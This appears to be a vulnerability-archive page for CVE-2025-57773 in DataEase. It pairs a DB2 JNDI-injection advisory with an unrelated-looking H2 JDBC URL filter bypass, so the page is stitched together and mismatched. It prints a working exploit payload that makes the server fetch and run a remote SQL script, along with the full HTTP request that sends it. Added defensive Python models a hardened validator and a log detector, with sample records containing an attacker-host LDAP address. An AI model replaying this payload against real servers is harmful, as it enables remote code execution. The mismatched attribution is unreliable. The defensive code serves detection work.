Related vulnerability
Title:
DataEase security vulnerability
(CVE-2025-57773)
Description: DataEase is an open-source data visualization and analysis tool from DataEase. It helps users analyze data quickly and spot business trends so that the business can be improved and optimized. DataEase versions before 2.10.12 contain a security vulnerability: the parameters of a DB2 datasource are not filtered, which can lead to a JNDI injection attack.
Description
Blackash-CVE-2025-57773
Introduction
# 🛡 CVE-2025-57773 – Security Overview
CVE-2025-57773 is a **critical vulnerability** in **DataEase**, an open-source business intelligence and data visualization tool, affecting all versions **prior to 2.10.12**. Because the parameters of a DB2 datasource are not filtered, an attacker can make the server perform a **JNDI lookup** of their choosing; the object that comes back is **deserialized**, and with the **AspectJWeaver** gadget chain that deserialization yields an **arbitrary file write**, which can be escalated to **remote code execution**. ⚠️💻
---
### 📌 General Information
| Field | Details |
| ---------------------- | --------------------------------------- |
| 🆔 CVE ID | CVE-2025-57773 |
| ⚠️ Severity | Critical |
| 🖥 Affected Software | DataEase (BI & data visualization tool) |
| 📦 Vulnerable Versions | Prior to 2.10.12 |
| 🛠 Type | JNDI Injection / Deserialization / RCE |
---
### 🛠 Technical Details
The vulnerability occurs because DataEase hands the connection parameters of a DB2 datasource to the driver without filtering them, so anyone who can submit a datasource configuration (the validate request below is sent with a session cookie) can embed a JNDI lookup address in those parameters.
| Step | Action |
| ---- | ---------------------------------------------------------------------------- |
| 1️⃣ | Attacker submits a DB2 datasource whose unfiltered parameters carry a JNDI lookup address |
| 2️⃣ | The server performs the lookup and deserializes the returned object; the AspectJWeaver gadget chain is used as the payload |
| 3️⃣ | Prerequisite for that chain: `commons-collections` 4.x and `aspectjweaver-1.9.22.jar` on the classpath |
| 4️⃣ | The gadget chain writes an arbitrary file, which can be leveraged into remote code execution 💀 |
---
### ⚡ Impact
| Impact Type | Description |
| ------------------------ | --------------------------------------- |
| 📝 File Manipulation | Arbitrary file writes |
| 💻 Remote Code Execution | Possible through deserialization attack |
---
### 🛡 Mitigation
| Mitigation Step | Recommendation |
| ------------------------------- | ---------------------------------------------------------- |
| ⬆️ Upgrade Software | Update DataEase to version 2.10.12 or later |
| 🧹 Input Validation / Filtering | Allowlist the DB2 connection properties a user may set and never pass user-supplied property names or JNDI addresses through to the driver |
---
Here, if the URL type matches, the return value is the result of the corresponding getJdbcUrl method. That is simply the getter for the jdbcUrl field, so it returns exactly the jdbcUrl value we passed in. This path never goes through the filtering logic that was added for H2, so it bypasses the earlier patch and hands our H2 JDBC URL back unchanged. Finally, we pass "driver":"org.h2.Driver" to select the driver explicitly; getDriver then loads the H2 driver and the JDBC connection is established with H2's logic, even though the datasource is declared as type "oracle" in the request.
The payload is as follows. Note that it contains the filtered keywords INIT and RUNSCRIPT verbatim, yet it still passes validation:
```json
{
"dataBase": "",
"driver": "org.h2.Driver",
"jdbcUrl": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:50025/poc.sql'",
"urlType": "jdbcUrl",
"sshType": "password",
"extraParams": "",
"username": "",
"password": "",
"host": "",
"authMethod": "",
"port": 0,
"initialPoolSize": 5,
"minPoolSize": 5,
"maxPoolSize": 5,
"queryTimeout": 30,
"connectionType": "sid"
}
```
```http
POST /de2api/datasource/validate HTTP/1.1
Host: 127.0.0.1:8100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 556
Origin: http://127.0.0.1:8100
Connection: close
Referer: http://127.0.0.1:8100/
Cookie: language=zh_CN; sessionId=29bd8318-3776-46a2-8a7e-d604dc4cdd33
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

{"id":"","name":"a","description":"","type":"oracle","configuration":"eyJkYXRhQmFzZSI6IiIsImRyaXZlciI6Im9yZy5oMi5Ecml2ZXIiLCJqZGJjVXJsIjoiamRiYzpoMjptZW06dGVzdGRiO1RSQUNFX0xFVkVMX1NZU1RFTV9PVVQ9MztJTklUPVJVTlNDUklQVCBGUk9NICdodHRwOi8vMTI3LjAuMC4xOjUwMDI1L3BvYy5zcWwnIiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiIiwicGFzc3dvcmQiOiIiLCJob3N0IjoiIiwiYXV0aE1ldGhvZCI6IiIsInBvcnQiOjAsImluaXRpYWxQb29sU2l6ZSI6NSwibWluUG9vbFNpemUiOjUsIm1heFBvb2xTaXplIjo1LCJxdWVyeVRpbWVvdXQiOjMwLCJjb25uZWN0aW9uVHlwZSI6InNpZCJ9"}
```
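The bypass above comes down to one pattern: the keyword filter was bolted onto the H2 code path, but `urlType=jdbcUrl` returns the raw getter value and the request can declare any type it likes while forcing `org.h2.Driver`. The following is an added example, not DataEase code: it models that patched-but-bypassable check next to a hardened validator that decides from what the connection will actually do (URL scheme, driver class and declared type must agree, and the H2 keyword filter applies to every URL that reaches the H2 driver). The function names, the type-to-driver table and the exact shape of the original filter are assumptions; the request fields (`type`, base64 `configuration`, `urlType`, `driver`, `jdbcUrl`) and the blocked keywords `INIT`/`RUNSCRIPT` come from the write-up.

```python
# Added example (not DataEase code): model of the jdbcUrl filter bypass next to
# a hardened validator. Function names, EXPECTED_DRIVER and the shape of the
# original keyword filter are assumptions; the request fields and the
# INIT/RUNSCRIPT keywords are taken from the write-up above.
import base64
import json
import re

H2_BLOCKED = ("INIT", "RUNSCRIPT")          # keywords the earlier patch rejects
SCHEME_RE = re.compile(r"^jdbc:([a-z0-9]+):", re.I)
EXPECTED_DRIVER = {                          # assumed type -> driver mapping
    "oracle": "oracle.jdbc.OracleDriver",
    "mysql": "com.mysql.cj.jdbc.Driver",
    "h2": "org.h2.Driver",
}

# The datasource configuration from the write-up (the base64 body, decoded).
CONFIG = {
    "dataBase": "", "driver": "org.h2.Driver",
    "jdbcUrl": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;"
               "INIT=RUNSCRIPT FROM 'http://127.0.0.1:50025/poc.sql'",
    "urlType": "jdbcUrl", "sshType": "password", "extraParams": "",
    "username": "", "password": "", "host": "", "authMethod": "", "port": 0,
    "initialPoolSize": 5, "minPoolSize": 5, "maxPoolSize": 5,
    "queryTimeout": 30, "connectionType": "sid",
}

def encode_request(ds_type, cfg):
    """Build the JSON body of POST /de2api/datasource/validate: the
    configuration travels as base64-encoded JSON inside the outer object."""
    b64 = base64.b64encode(json.dumps(cfg, separators=(",", ":")).encode()).decode()
    return json.dumps({"id": "", "name": "a", "description": "",
                       "type": ds_type, "configuration": b64})

def decode_request(body):
    """Inverse of encode_request: returns (type, decoded configuration dict)."""
    outer = json.loads(body)
    return outer["type"], json.loads(base64.b64decode(outer["configuration"]))

def build_url(ds_type, cfg):
    """Assumed model of URL construction: urlType=jdbcUrl returns the raw
    getter value (getJdbcUrl); otherwise a URL is composed from the fields."""
    if cfg.get("urlType") == "jdbcUrl":
        return cfg["jdbcUrl"]
    if ds_type == "h2":
        return "jdbc:h2:" + cfg.get("dataBase", "")
    return f"jdbc:{ds_type}://{cfg.get('host', '')}:{cfg.get('port', 0)}/{cfg.get('dataBase', '')}"

def keyword_hits(url):
    """Case-insensitive substring check for the blocked H2 keywords."""
    return [f"blocked keyword {kw}" for kw in H2_BLOCKED if kw.lower() in url.lower()]

def vulnerable_findings(ds_type, cfg):
    """Patched-but-bypassable logic: the keyword filter runs only on the H2
    datasource path and only on the composed URL, never on the getter value."""
    if ds_type == "h2" and cfg.get("urlType") != "jdbcUrl":
        return keyword_hits(build_url(ds_type, cfg))
    return []

def hardened_findings(ds_type, cfg):
    """Decide from what the connection will actually do: scheme, driver class
    and declared type must agree, and the H2 filter applies to every URL
    that will reach the H2 driver, whichever field carried it."""
    url = build_url(ds_type, cfg)
    m = SCHEME_RE.match(url)
    scheme = m.group(1).lower() if m else ""
    driver = cfg.get("driver") or EXPECTED_DRIVER.get(ds_type, "")
    findings = []
    if scheme != ds_type:
        findings.append(f"url scheme {scheme!r} does not match datasource type {ds_type!r}")
    if driver != EXPECTED_DRIVER.get(ds_type):
        findings.append(f"driver {driver!r} is not the expected driver for {ds_type!r}")
    if scheme == "h2" or driver == "org.h2.Driver":
        findings += keyword_hits(url)
    return findings

if __name__ == "__main__":
    ds_type, cfg = decode_request(encode_request("oracle", CONFIG))
    print("vulnerable:", vulnerable_findings(ds_type, cfg) or "accepted")
    print("hardened:  ", hardened_findings(ds_type, cfg) or "accepted")
```

Run stand-alone, the vulnerable model accepts the write-up's payload while the hardened check reports the scheme/type mismatch, the forced H2 driver and both blocked keywords. The substring keyword check is kept because that is what the page describes; a stronger rule for H2 is to allowlist the settings permitted after `;` rather than to blocklist two names.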

---
Here’s a clear and actionable set of advice for **CVE-2025-57773**:
---
### 🔹 Immediate Actions
1. **Upgrade DataEase** ⬆️
* Install version **2.10.12 or later** immediately. This is the only way to fully patch the vulnerability.
2. **Sanitize DB2 Parameters** 🧹
* If you maintain a fork or cannot upgrade at once, validate datasource configurations server-side: allowlist the DB2 connection properties a user may set and reject anything that is not on the list, rather than passing user-supplied properties through to the driver.
3. **Audit Dependencies** 📦
* The gadget chain needs both `commons-collections` 4.x and `aspectjweaver-1.9.22.jar` on the classpath. Check whether your deployment (and anything else sharing the JVM) ships them; removing or replacing them raises the bar for this chain but does not remove the JNDI injection itself.
4. **Monitor Logs** 🔍
* Review datasource create and validate requests for JNDI lookup addresses (`ldap://`, `rmi://`) in DB2 connection parameters, watch for unexpected outbound LDAP or RMI connections from the DataEase host, and alert on unexpected file writes under the application directory.
5. **Limit Exposure** 🔒
* Restrict network access to DataEase and block outbound LDAP and RMI from the server until the patch is applied.
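The "Monitor Logs" item is vague as written; what a SOC actually needs is something that decodes the nested base64 `configuration` of datasource requests and flags the two abuse patterns this page documents. The following is an added example, not DataEase code or part of the original advisory. It assumes access logs that keep the request body, one JSON record per line, and that validate and save requests share the `/de2api/datasource` prefix; the endpoint `/de2api/datasource/validate`, the base64 `configuration` field and the `INIT`/`RUNSCRIPT` keywords come from the page, and the `ldap://`/`rmi://` check covers the JNDI injection class the CVE belongs to. The DB2 property name in the third sample record is a placeholder, not the real parameter.

```python
# Added example (not DataEase code): detector for the datasource requests
# discussed on this page, run over constructed log records. Log format and
# path-prefix match are assumptions; the endpoint, the base64 configuration
# field and the INIT/RUNSCRIPT keywords come from the write-up.
import base64
import json
import re

JNDI_RE = re.compile(r"\b(ldaps?|rmi|iiop)://", re.I)   # JNDI lookup schemes
H2_SCRIPT_RE = re.compile(r"\b(INIT|RUNSCRIPT)\b", re.I)
DATASOURCE_PATH = "/de2api/datasource"      # assumed: validate and save share this prefix

def flatten(value):
    """Yield every string inside a nested JSON structure."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from flatten(v)
    elif isinstance(value, list):
        for v in value:
            yield from flatten(v)

def inspect_body(body):
    """Return alert reasons for one datasource request body (empty = clean)."""
    try:
        outer = json.loads(body)
        cfg = json.loads(base64.b64decode(outer.get("configuration", "")))
    except (ValueError, KeyError, TypeError, AttributeError):
        return ["configuration field is not base64-encoded JSON"]
    reasons = []
    ds_type = str(outer.get("type", "")).lower()
    driver = str(cfg.get("driver", ""))
    url = str(cfg.get("jdbcUrl", ""))
    if driver == "org.h2.Driver" and ds_type != "h2":
        reasons.append(f"H2 driver forced on a {ds_type!r} datasource")
    if url.lower().startswith("jdbc:h2:") and H2_SCRIPT_RE.search(url):
        reasons.append("H2 URL carries INIT/RUNSCRIPT")
    for s in flatten(cfg):
        if JNDI_RE.search(s):
            reasons.append(f"JNDI-style address in configuration: {s[:60]}")
            break
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for every suspicious datasource request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        rec = json.loads(line)
        if rec.get("method") != "POST" or not rec.get("path", "").startswith(DATASOURCE_PATH):
            continue
        reasons = inspect_body(rec.get("body", ""))
        if reasons:
            hits.append((n, reasons))
    return hits

def b64cfg(cfg):
    """Encode a configuration the way the DataEase client does (base64 JSON)."""
    return base64.b64encode(json.dumps(cfg).encode()).decode()

# Constructed sample log: a benign Oracle validate, the H2 payload from the
# write-up, a DB2 datasource whose (placeholder-named) property points at an
# LDAP server, and a GET that is ignored.
SAMPLE_LOG = [
    json.dumps({"method": "POST", "path": "/de2api/datasource/validate", "status": 200,
                "body": json.dumps({"type": "oracle", "configuration": b64cfg(
                    {"urlType": "jdbcUrl", "jdbcUrl": "jdbc:oracle:thin:@db:1521:ORCL", "driver": ""})})}),
    json.dumps({"method": "POST", "path": "/de2api/datasource/validate", "status": 200,
                "body": json.dumps({"type": "oracle", "configuration": b64cfg(
                    {"urlType": "jdbcUrl", "driver": "org.h2.Driver",
                     "jdbcUrl": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;"
                                "INIT=RUNSCRIPT FROM 'http://127.0.0.1:50025/poc.sql'"})})}),
    json.dumps({"method": "POST", "path": "/de2api/datasource/validate", "status": 500,
                "body": json.dumps({"type": "db2", "configuration": b64cfg(
                    {"host": "db2.internal", "port": 50000, "dataBase": "SAMPLE",
                     "extraParams": "placeholderProperty=ldap://attacker.example:1389/x"})})}),
    json.dumps({"method": "GET", "path": "/de2api/datasource/list", "status": 200, "body": ""}),
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

The detector walks every string in the decoded configuration rather than only the fields it knows, so a JNDI address hidden in any DB2 property is caught without knowing the property's name; a body whose `configuration` does not decode is flagged as well, since the legitimate client always sends base64 JSON.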
---
### 🔹 Long-Term Recommendations
* **Regular Updates** 🔄 – Keep DataEase and all related libraries up to date.
* **Security Scanning** 🛡 – Run vulnerability scanners periodically to detect risky components.
* **Incident Response Plan** 📋 – Prepare procedures for quickly responding to potential exploits.
* **User Awareness** 👥 – Train admins and developers about injection attacks and safe coding practices.
---
### ⚠️ Disclaimer
The information provided about **CVE-2025-57773** is for **educational, awareness, and defensive purposes only**. It is intended to help administrators, developers, and security professionals **understand the vulnerability and protect their systems**.
**Do not use this information to exploit systems or conduct unauthorized activities.** Unauthorized access or attacks on systems without permission are **illegal and punishable by law**.
Always apply security updates, follow best practices, and operate within legal and ethical boundaries when handling vulnerabilities.
---
File snapshot
[4.0K] /data/pocs/e8bde6b55def5508a363d7d5621c30608ba41681
└── [6.5K] README.md
0 directories, 1 file
Notes
1. Accessing the original source is recommended.
2. If the source has gone away or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to keep it maintained long-term, please consider paying for the local POC. Thank you for your support.